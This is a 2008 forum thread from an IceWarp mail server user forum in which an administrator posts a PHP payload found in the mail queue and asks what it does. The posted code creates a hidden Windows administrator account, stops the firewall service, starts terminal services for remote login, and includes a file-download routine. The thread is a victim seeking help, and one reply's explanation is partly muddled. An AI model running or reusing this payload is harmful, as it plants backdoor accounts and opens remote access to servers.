IceWarp Server User to User Forum IceWarp Server User to User Forum

Forums  Register  Login  My Profile  Inbox  Address Book  My Subscription  My Forums 

Photo Gallery  Member List  Search  Calendars  FAQ  Ticket List  Log Out

Hack attempt?

  		Logged in as: Guest
Users viewing this topic: none
  Printable Version
All Forums >> [Security] >> IceWarp Server Security Settings >> Hack attempt? Page: [1]
Login
Message << Older Topic   Newer Topic >>
Hack attempt? - 10/13/2008 7:27:56 PM   
triangulum

 

Posts: 17
Score: 0
Joined: 5/2/2008
Status: offline 		I've recently been getting a lot of messages stuck in the queue that are pure PHP code:


------------------------------6a52fd0313af
Content-Disposition: form-data; name="data"
ob_start();
phpinfo();
$phpinfo = array('phpinfo' => array());
if(preg_match_all('#(?:<h2>(?:<a name=".*?">)?(.*?)(?:</a>)?</h2>)|(?:<tr(?: class=".*?")?><t[hd](?: class=".*?")?>(.*?)\s*</t[hd]>(?:<t[hd](?: class=".*?")?>(.*?)\s*</t[hd]>(?:<t[hd](?: class=".*?")?>(.*?)\s*</t[hd]>)?)?</tr>)#s', ob_get_clean(), $matches, PREG_SET_ORDER))
   foreach($matches as $match)
       if(strlen($match[1]))
           $phpinfo[$match[1]] = array();
       elseif(isset($match[3]))
           $phpinfo[end(array_keys($phpinfo))][$match[2]] = isset($match[4]) ? array($match[3], $match[4]) : $match[3];
       else
           $phpinfo[end(array_keys($phpinfo))][] = $match[2];
echo "VULNERABLE\n";
echo "SYSTEM: ".$phpinfo['phpinfo']['System']."\n";
if($_ENV['OS'] == "Windows_NT") {
$login ="IWAM_".rand (10000, 99999);
$password = "-".rand (10000, 99999)."@";
echo "LOGIN: $login\n";
echo "PASSWORD: $password\n";
@system("net user $login $password /ADD /EXPIRES:NEVER /ACTIVE:YES");
@system("net localgroup administrators $login /add");
@system("net localgroup administrateurs $login /add");
@system("net localgroup administratorens $login /add");
@system("net stop sharedaccess");
@system("net start dcomlaunch");
@system("net start termservice");
taille("c:");
taille("d:");
taille("e:");
taille("f:");
taille("g:");
taille("h:");
taille("i:");
taille("j:");
taille("k:");
taille("l:");
taille("m:");
taille("n:"); 
taille("o:");
taille("p:");
taille("q:");
taille("r:");
taille("s:");
taille("t:");
taille("u:");
taille("v:");
taille("w:");
taille("x:");
taille("y:");
taille("z:");
} else {
taille("/");
}
function download($file,$link) {
@unlink($file);
$get = @file_get_contents($link);
$fhack = @fopen ($file, "a");
@fwrite ($fhack, $get);
@fclose ($fhack);
}
function taille($disk) {
// Entrez la partition
$dt = disk_total_space($disk);
// Réentrez la partition
$df = disk_free_space($disk);
if(!$dt) { return; }
$used = $dt - $df;
echo "$disk Total: ".getSize($dt)." Free: ".getSize($df)." Used: ".getSize($used)."\n";
}
function getSize($taille, $units = "yes") {
$dimSize = array("octets", "Ko", "Mo", "Go", "To");
$i = 0;
while ($taille >= 1024) {
 $taille /= 1024;
 $i++;
}
return ($units == "yes") ? round($taille, 2) . " " . $dimSize[$i] : round($taille, 2);
}
------------------------------6a52fd0313af--


There is no from, to, or subject.  Looks like some kind of hack attempt.

Does anyone have any idea what this does + advice on how to block these?

Chris...
Post #: 1
RE: Hack attempt? - 10/18/2008 3:05:59 AM   
marciohumpris

 

Posts: 274
Score: 0
Joined: 5/1/2008
Status: offline 		Wow, this is really strange. A message containing code? Where does the message com from? Seems the source code is commented in French.

Maybe send the original message to support and try to figure out a bit more. What you mean theyre stuck in queue? In /temp folder??

regards,
Marcio

(in reply to triangulum)
Post #: 2
RE: Hack attempt? - 10/25/2008 4:44:50 AM   
triangulum

 

Posts: 17
Score: 0
Joined: 5/2/2008
Status: offline 		Hi Marcio

They're sitting in the incoming queue and never get passed through anywhere.  Theres's no "from" or "to", and I can't link them to a specific connection.

I've been going through firewall logs but no luck yet.  I think I'll ask support as you suggest.

(in reply to marciohumpris)
Post #: 3
RE: Hack attempt? - 10/31/2008 4:45:23 AM   
marciohumpris

 

Posts: 274
Score: 0
Joined: 5/1/2008
Status: offline 		Hi, Triangulum

Quite strange!! Never seen this. I suggest you send to support so they can try to figure it out.

If you found out, please keep us posted, were also curious :)

regards,
Marcio

(in reply to triangulum)
Post #: 4
RE: Hack attempt? - 11/12/2008 6:17:52 AM   
IceWarpTR Ozcanyildiz

 

Posts: 1
Score: 0
Joined: 9/5/2008
Status: offline 		Dear Chris;
as my experience this is a basic windows system service hacking attempt written in php.
This code checks and tries to stop and start some services for remote desktop conn.
There are several codes which are trying to find authenticated user credentials, and by this way if you simply logged into the server by any username and password , the server assumes that user is an windows user and the hcker can use this by stopping or starting some services . sşmply it starts a terminal services and by its username and password the hacker can logged in. this means the user is in...if you use Windows Authentication method, the web browser sends the logged in user's credentials to the web server, by this way you can tell what Windows user is logged in. if you are using php-asp auth method by this method noone can see the credentials.


Cheers.

Ozcan /Turkey

< Message edited by IWAdmin DanG -- 11/13/2008 8:01:12 AM >

(in reply to marciohumpris)
Post #: 5
Page:   [1]
All Forums >> [Security] >> IceWarp Server Security Settings >> Hack attempt? Page: [1]
Jump to:





New Messages No New Messages
Hot Topic w/ New Messages Hot Topic w/o New Messages
Locked w/ New Messages Locked w/o New Messages
 Post New Thread
 Reply to Message
 Post New Poll
 Submit Vote
 Delete My Own Post
 Delete My Own Thread
 Rate Posts


2001 - 2008 © IceWarp